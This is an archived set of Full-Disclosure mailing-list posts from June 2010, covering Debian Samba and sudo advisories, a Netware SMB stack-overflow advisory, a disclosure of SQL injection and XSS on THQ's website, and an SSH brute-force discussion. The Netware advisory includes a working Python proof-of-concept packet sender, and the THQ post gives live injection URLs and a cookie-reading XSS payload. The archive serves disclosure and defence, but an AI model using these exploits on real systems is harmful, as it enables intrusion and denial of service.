[Full-disclosure] [SECURITY] [DSA 2061-1] New samba packages fix arbitrary code execution

2010-06-17 Thread Nico Golde 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ---
Debian Security Advisory DSA-2061-1 secur...@debian.org
http://www.debian.org/security/  Nico Golde
June 16th, 2010  http://www.debian.org/security/faq
- ---

Package: samba
Vulnerability  : memory corruption
Problem type   : remote
Debian-specific: no
Debian bug : none
CVE ID : CVE-2010-2063

Jun Mao discovered that Samba, an implementation of the SMB/CIFS protocol
for Unix systems, is not properly handling certain offset values when
processing chained SMB1 packets.  This enables an unauthenticated attacker
to write to an arbitrary memory location resulting in the possibility to
execute arbitrary code with root privileges or to perform denial of service
attacks by crashing the samba daemon.


For the stable distribution (lenny), this problem has been fixed in
version 3.2.5-4lenny12.

This problem does not affect the versions in the testing (squeeze) and
unstable (sid) distribution.


We recommend that you upgrade your samba packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/s/samba/samba_3.2.5-4lenny12.diff.gz
Size/MD5 checksum:   239453 262a0d71af5629b5b743a2dd7699346a
  http://security.debian.org/pool/updates/main/s/samba/samba_3.2.5-4lenny12.dsc
Size/MD5 checksum: 1834 752097289f87a23ffed0bd884a8c1093

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/s/samba/samba-doc-pdf_3.2.5-4lenny12_all.deb
Size/MD5 checksum:  6252872 5bd2b9f3ce45c28733e4736af45cfa0b
  
http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.2.5-4lenny12_all.deb
Size/MD5 checksum:  7949770 92c0aa87e34926cc8d05c844f96ccdf2

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/s/samba/samba-tools_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  5734864 a3b2a0b1a098268d7f3fb408adca0663
  
http://security.debian.org/pool/updates/main/s/samba/samba_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  4832766 221ccfadf707e5c1e2ec35162ca5e105
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  1333498 c85f1d0e2740701be6e48fa48d5eced4
  
http://security.debian.org/pool/updates/main/s/samba/smbclient_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  6954426 110e2b73b8c7ce273f810af64e0b131c
  
http://security.debian.org/pool/updates/main/s/samba/swat_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  1080334 8fc3c77432c4f9a5d1626ca7b0ced0a6
  
http://security.debian.org/pool/updates/main/s/samba/libwbclient0_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:81696 6e48d5b3f4876a7e23387c409c3d343d
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  2573704 d370dd920eb28ff1d58f8ecf2a13d429
  
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:   637646 b7fb85ef15e39bd1a9e663549d9b36a8
  
http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  1948208 a22dbf0b9a49c79bbb3f060bb94f68a3
  
http://security.debian.org/pool/updates/main/s/samba/samba-common_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  3730776 82de247611e9295c002923634d3ee25e
  
http://security.debian.org/pool/updates/main/s/samba/smbfs_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  1462704 ee4f7318a9c09923ff9819e1225dfa53
  
http://security.debian.org/pool/updates/main/s/samba/winbind_3.2.5-4lenny12_alpha.deb
Size/MD5 checksum:  3269808 5cc94c8ffe70c5eb15581649d19ea4ef

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.2.5-4lenny12_amd64.deb
Size/MD5 checksum:   628118 03a960adaf8f29de55ef7803272808c4
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.2.5-4lenny12_amd64.deb
Size/MD5 checksum:  1359472 e4ec2ceae3e01f0c7252970c38f9db35
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.2.5-4lenny12_amd64.deb
Size/MD5 checksum:  1953836 95004a2

[Full-disclosure] stratsec Security Advisory SS-2010-006: Netware SMB Remote Stack Overflow

2010-06-17 Thread stratsec Advisories 
===
Stratsec Security Advisory: SS-2010-006 
===

Title:   Netware SMB Remote Stack Overflow 
Version: 1.0
Issue type:  Stack Overflow
Affected vendor: Novell
Release date:17/06/2010
Discovered by:   Laurent Gaffié
Issue status:Patch available

===

Summary
---

A vulnerability exists in the Netware CIFS.NLM driver which allows an attacker 
to trigger a kernel stack overflow by sending a specific 'Sessions Setup AndX' 
query. Successful exploitation of this issue will result in remote code 
execution with kernel privileges. Failed attempts may result in a remote denial
of service.


Description
---
The Server Message Block (SMB) protocol, also known as Common Internet File 
System (CIFS) acts as an application-layer protocol to provide shared access
to files, printers and Inter-Process Communication (IPC). It is also a transport
for Distributed Computing Environment / Remote Procedure Call (DCE / RPC) 
operations.After negotiating a SMB communication the client sends a 
'Session Setup AndX' packet to negotiate a session, to be able to connect on a
specific share. By sending a specially crafted request packet containing a long
'AccountName' value, it is possible trigger a kernel stack overflow.


Impact
--

A remote attacker may be able to remotely execute code with kernel privileges
on affected Netware systems. Failed attempts will result in a denial of service.


Affected products
-

Netware version 6.5 SP8 and prior.


Proof of concept


import sys,socket
from socket import *

if len(sys.argv)<=1:
 sys.exit('usage: python netware.py IP_ADDR')

host = sys.argv[1],139
payload = "A" * 200

packetnego=(
"\x00\x00\x00\x9a"
"\xff\x53\x4d\x42\x72\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00"
"\x01\x3d\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52"
"\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02"
"\x4d\x49\x43\x52\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x29\x4f"
"\x52\x4b\x53\x20\x33\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d"
"\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x44\x4f\x53\x20\x4c\x41"
"\x4e\x4d\x20\x4e\x32\x2e\x31\x00\x02\x57\x69\x6e\x64\x6f\x77"
"\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70"
"\x73\x20\x33\x2e\x31\x61\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30"
"\x2e\x31\x32\x00"
)

packetsession=(
"\x00\x00\x01\x3e"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf9\x19\x01\x00\x81\x61"
"\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x28\xd4\xce"
"\xd7\x93\xc8\x8b\x16\x5f\x42\x2a\x7a\xfd\x15\x7a\xfd\x15\x7a\xfd"+payload+
"\xef\xa5\x42\x5e\x5c\x2d\x4b\x1a\x1c\x59\x4f\x00\x57\x4f\x52\x4b"
"\x47\x52\x4f\x55\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e"
"\x30\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff"
"\x00\x00\x00\x02\x00\x01\x00\x1f\x00\x00\x5c\x5c\x57\x49\x4e\x2d"
"\x45\x37\x4a\x30\x4f\x4e\x49\x4d\x53\x45\x33\x5c\x55\x53\x45\x52"
"\x53\x00\x3f\x3f\x3f\x3f\x3f\x00"
)

## chained Session Setup Andx, tree connect command, field = username, basic 
stack overflow.

s = socket(AF_INET, SOCK_STREAM)
s.connect(host) 
s.send(''.join(packetnego))
s.send(''.join(packetsession))
print "done !"


Solution


Apply NSS update located at: 
* http://download.novell.com/Download?buildid=tMWCI1cdI7s~

This patch has not been verified by stratsec.


Response timeline
-

* 07/02/2010 - Issue discovered.
* 10/02/2010 - Vendor notified.
* 10/02/2010 - Vendor acknowledged receipt of advisory.
* 11/02/2010 - Vendor confirmed issue presence.
* 16/06/2010 - Patch released by vendor.
* 17/06/2010 - stratsec advisory published.

References
--

* Vendor advisory: http://download.novell.com/Download?buildid=tMWCI1cdI7s~

===

About stratsec
--
Stratsec, specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia. 

For more information, please visit our website at http://www.stratsec.net/ 

===
-- 
Message  protected by MailGuard: e-mail anti-virus, anti-spam and content 
filtering.http://www.mailguard.com.au/mg

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Host

Re: [Full-disclosure] Congratulations Andrew

2010-06-17 Thread Brian Keefer 
On Jun 16, 2010, at 11:56 AM, wilder_jeff Wilder wrote:

> 
> By that same standard.. if you leave your house unlocked does that give 
> someone the right to enter it?
> 
> just my thought
> s

It wasn't an unlocked house.  It was a table on the sidewalk with all the 
neighbors' Girlscout cookie order sheets on it.  Someone just happened to 
pickup not only their order sheet, but everyone else's too.

Think you could get a theft prosecution for that?

--
chort___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] THQ website has multiple SQL injection bugs, and a reflected XSS

2010-06-17 Thread Harry Balls 
This is pretty much because I want to embarrass these assholes. See: 
http://gamepolitics.com/2010/06/14/exec-thq-anti-used-game-initiative-could-make-everyone-happy

SQLi 1: 
http://www.thq.com/us/mythq/register?contentType=GAMEALERT&alertGame='4896

This one is pretty obvious. It's an injection via $_GET. The funniest part is 
that they don't just allow injection. They serve up the whole PHP source of the 
page for you. Giving you table names, and the actual syntax of the query being 
used.

SQLi 2:
The next one is an injection via POST in their registration form here: 
http://www.thq.com/us/mythq/register

I used burpsuite to inject it by editing the HTTP requests but you can probably 
just enter whatever you want right in the form. I used the UK subdomain for 
testing: http://uk.thq.com/uk/mythq/register. This one also shows the source.

Next one is your typical reflected XSS:

http://www.thq.com/us/search/index?keyw=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

I hope this is enough to put off anyone who was thinking of buying shit from 
them.
Would you trust this company with your credit card information when they can't 
even properly sanitize a registration form?
These probably aren't even the only security bugs on their site. This is just 
after 10 minutes of pentesting. Do yourself a favor and stay far far away from 
this company. They have no clue about security and obviously don't give a shit 
about their customers.

BOYCOTT THQ



  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Congratulations Andrew

2010-06-17 Thread huj huj huj 
just bugger off then
you will not be missed

2010/6/17 ghost 

> To sum up what full-disclosure has become:
>
> random arrested and charged with drug possession = 30+ posts
>
> unreal ircd backdoored = 4? responses.
>
>
> *sigh*
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2062-1] New sudo packages fix environment sanitization bypass vulnerability

2010-06-17 Thread Giuseppe Iuculano 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2062-1  secur...@debian.org
http://www.debian.org/security/Giuseppe Iuculano
June 17, 2010 http://www.debian.org/security/faq
- 

Package: sudo
Vulnerability  : missing input sanitization
Problem type   : local
Debian-specific: no
CVE Id : CVE-2010-1646
Debian Bug : 585394


Anders Kaseorg and Evan Broder discovered a vulnerability in sudo, a
program designed to allow a sysadmin to give limited root privileges to
users, that allows a user with sudo permissions on certain programs to
use those programs with an untrusted value of PATH.
This could possibly lead to certain intended restrictions being bypassed,
such as the secure_path setting.


For the stable distribution (lenny), this problem has been fixed in
version 1.6.9p17-3

For the unstable distribution (sid), this problem has been fixed in
version 1.7.2p7-1, and will migrate to the testing distribution (squeeze)
shortly.


We recommend that you upgrade your sudo package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3.diff.gz
Size/MD5 checksum:22680 0dbccca405985efdbad35890d3c3f8a1
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3.dsc
Size/MD5 checksum: 1636 c9e25ecaf202c03ef25df5ae1ff3f275
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17.orig.tar.gz
Size/MD5 checksum:   593534 60daf18f28e2c1eb7641c4408e244110

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_alpha.deb
Size/MD5 checksum:   203036 027ea3be387d79ef0adffd7514a6b11a
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_alpha.deb
Size/MD5 checksum:   190120 8fc466a554ad087e44a0ea758269bce7

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_amd64.deb
Size/MD5 checksum:   200832 4c918da4eaee54e671ef187f3dcd16c2
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_amd64.deb
Size/MD5 checksum:   188460 5a10ab0f58b10b3ffefe8e7a236e7b15

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_arm.deb
Size/MD5 checksum:   179384 95fff379279d44e59f0ff19cd4f21a65
  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_arm.deb
Size/MD5 checksum:   191446 67b5305265b70b5726c2e5cfbf6f89e0

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_armel.deb
Size/MD5 checksum:   190316 d1862bbf805e192318e8db91e6d95463
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_armel.deb
Size/MD5 checksum:   178966 fa472c7551045fdd8f5c4c0c2a2fc423

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_hppa.deb
Size/MD5 checksum:   198898 679645aea800265e36c76b6c0f4e982a
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_hppa.deb
Size/MD5 checksum:   186044 9a4a50c7782b24bdfd91e66953476d3b

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_i386.deb
Size/MD5 checksum:   176354 7afb577238bcf9d9b65ca69d70096157
  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_i386.deb
Size/MD5 checksum:   188014 ce2cad49130d76a8190e9a2171cd8cd4

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_ia64.deb
Size/MD5 checksum:   220268 374351a7d4acd6b27c3d8ab8b4e57939
  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_ia64.deb
Size/MD5 checksum:   235608 e69fc1ddc776149c10d439e6a4e1ec99

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/s/sudo/sudo-ldap_1.6.9p17-3_mips.deb
Size/MD5 checksum:   197388 3e580a7b5accf60fa0db06e22e39d944
  http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.9p17-3_mips.deb
Size/MD5 checksum:   184548 58e5cadabcb33baeafd73dfeb602b8c

[Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault 
Hello list,

I have a strange situation and would like information from the
list members. I have three Linux boxes exposed to the Internet. Two of
them are on cable modems, and both have two services that are publicly
available. In both cases, I have SSH and named running and available
to the public. Before you folks say it, yes I run SSH on TCP/22 and no
I don't want to move it to another port, and no I don't want to
restrict it to certain source IPs.

Both of these systems are within one /21 and get attacked
regularly. I run Denyhosts on them, and update the central server once
an hour with attacking IPs, and obviously also download the public
hosts.deny list.

These machines get hit regularly, so often that I don't really
care, it's fun to make the script kiddies waste their time! But in
this instance, only my home box is being attacked... someone is
burning a lot of cycles and hosts to do a distributed dictionary
attack on my one box! The named daemon is non recursive, properly
configured, up to date and not being attacked.

Is anyone else seeing this type of attack? Or is someone really
targeting MY box?

Thanks


Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread dink 

Have you ever considered obfuscated-openssh?

http://github.com/brl/obfuscated-openssh

I have a modified version of PuTTY available for it...

http://www.mrhinkydink.com/potty.htm

Still... you should change the freakin' port.

 Original Message 
Subject: [Full-disclosure] targetted SSH bruteforce attacks
From: Gary Baribault 
Date: Thu, June 17, 2010 7:48 am
To: full-disclosure@lists.grok.org.uk

Hello list,

 I have a strange situation and would like information from the
list members. I have three Linux boxes exposed to the Internet. Two of
them are on cable modems, and both have two services that are publicly
available. In both cases, I have SSH and named running and available
to the public. Before you folks say it, yes I run SSH on TCP/22 and no
I don't want to move it to another port, and no I don't want to
restrict it to certain source IPs.

 Both of these systems are within one /21 and get attacked
regularly. I run Denyhosts on them, and update the central server once
an hour with attacking IPs, and obviously also download the public
hosts.deny list.

 These machines get hit regularly, so often that I don't really
care, it's fun to make the script kiddies waste their time! But in
this instance, only my home box is being attacked... someone is
burning a lot of cycles and hosts to do a distributed dictionary
attack on my one box! The named daemon is non recursive, properly
configured, up to date and not being attacked.

 Is anyone else seeing this type of attack? Or is someone really
targeting MY box?

Thanks


Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault 
I just knew that people would say that, and that's why I specified
that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
interesting to see new types of attacks. The question here is whether
anyone else is seeing such a targeted attack.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 08:28 AM, d...@mrhinkydink.com wrote:
>
> Have you ever considered obfuscated-openssh?
>
> http://github.com/brl/obfuscated-openssh
>
> I have a modified version of PuTTY available for it...
>
> http://www.mrhinkydink.com/potty.htm
>
> Still... you should change the freakin' port.
>
>  Original Message  Subject: [Full-disclosure]
> targetted SSH bruteforce attacks From: Gary Baribault
>  Date: Thu, June 17, 2010 7:48 am To:
> full-disclosure@lists.grok.org.uk
>
> Hello list,
>
> I have a strange situation and would like information from the list
> members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are
> publicly available. In both cases, I have SSH and named running and
> available to the public. Before you folks say it, yes I run SSH on
> TCP/22 and no I don't want to move it to another port, and no I
> don't want to restrict it to certain source IPs.
>
> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server
> once an hour with attacking IPs, and obviously also download the
> public hosts.deny list.
>
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault 
My Denyhosts daemon is configured pretty much like that, but it uses
TCP Wrapper (hosts.deny) instead of the firewall and it uploads the
attacking IPs to a central server every hour for other Denyhosts users.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

On 06/17/2010 08:32 AM, Gregory Bellier wrote:
> Hi !
>
> Most of the time (to not say everytime), it's a bot and not a human
> behind those attacks.
> I configured my firewall to ban for a minute every IPs trying to log
> in with 5 wrong attempts.
> Once it's banned, the bot tries one or two more times and then give up.
>
> It's pretty much effective.
>
> 
>
> 2010/6/17 Gary Baribault  >
>
> Hello list,
>
>I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet.
> Two of
> them are on cable modems, and both have two services that are
> publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22
> and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
>
>Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central
> server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
>
>These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
>Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault
> Courriel: g...@baribault.net 
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault 
Did you ever figure out if YOU where targeted or if someone just liked
your box? In my case I have two servers within one IP block for the
cable modem provider, and in the past BOTH boxes where always attacked
together, which indicated that it was probably the entire ISP that was
targeted. In this case it's only one of my boxes.

I'm not particularly worried, root is not allowed, and on that box
there is only one valid UID that's allowed SSH access.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 08:37 AM, Adam Richards wrote:
> I had an attacker go after one of my FreeBSD machines for almost two
> months straight. I wrote my own denyhost (like) script and banned his
> IP's constantly, but it didn't stop until he ran out of proxies I guess.
> Either that or it was busy season for my ip block.
>
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gary
> Baribault
> Sent: Thursday, June 17, 2010 6:48 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] targetted SSH bruteforce attacks
>
> Hello list,
>
> I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
>
> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
>
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Emmanuel VERCHERE 
Hi Gary,

SSH daemons using password auth exposed to the Internet _do_ get
bruteforce attempts. I would not recommend moving it to a different port
than 22 as that would be of very, _very_ little help - rather switch to
public key auth (plus SPA if you're paranoid), et voila.
I don't think there's someone out there craving for _your_ box - but
scripts running from compromised hosts, scanning for password-protected
SSH daemons (as well as a bunch of known exploitable webapps and
services), trying to reach out for 'fresh meat', and as such expand the
zombie net? Definitely ;)

Cheers.
 


On Thu, 17 Jun 2010 07:48:18 -0400
Gary Baribault  wrote:

> Hello list,
> 
> I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
> 
> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
> 
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
> 
> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
> 
> Thanks
> 
> 
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 
__
 Emmanuel VERCHERE
everchere  everchere  com
   http://everchere.com/emmanuel.verchere.asc
   CF41 68A4 5C7F 6598 8F08  D04D BD55 EBD1 71E1 1339


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault 
Thanks Emmanuel,

I have to access that box sometimes from other machines than my
own, so I would have to have my key and install it on all kinds of
Windows boxen .. I have extremely good passwords that I change every
30 days, or every time I use a machine that I'm not 100% sure of.

Gary Baribault

Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 08:45 AM, Emmanuel VERCHERE wrote:
> Hi Gary,
>
> SSH daemons using password auth exposed to the Internet _do_ get
> bruteforce attempts. I would not recommend moving it to a different port
> than 22 as that would be of very, _very_ little help - rather switch to
> public key auth (plus SPA if you're paranoid), et voila.
> I don't think there's someone out there craving for _your_ box - but
> scripts running from compromised hosts, scanning for password-protected
> SSH daemons (as well as a bunch of known exploitable webapps and
> services), trying to reach out for 'fresh meat', and as such expand the
> zombie net? Definitely ;)
>
> Cheers.
> 
>
>
> On Thu, 17 Jun 2010 07:48:18 -0400
> Gary Baribault  wrote:
>
>> Hello list,
>>
>> I have a strange situation and would like information from the
>> list members. I have three Linux boxes exposed to the Internet. Two of
>> them are on cable modems, and both have two services that are publicly
>> available. In both cases, I have SSH and named running and available
>> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
>> I don't want to move it to another port, and no I don't want to
>> restrict it to certain source IPs.
>>
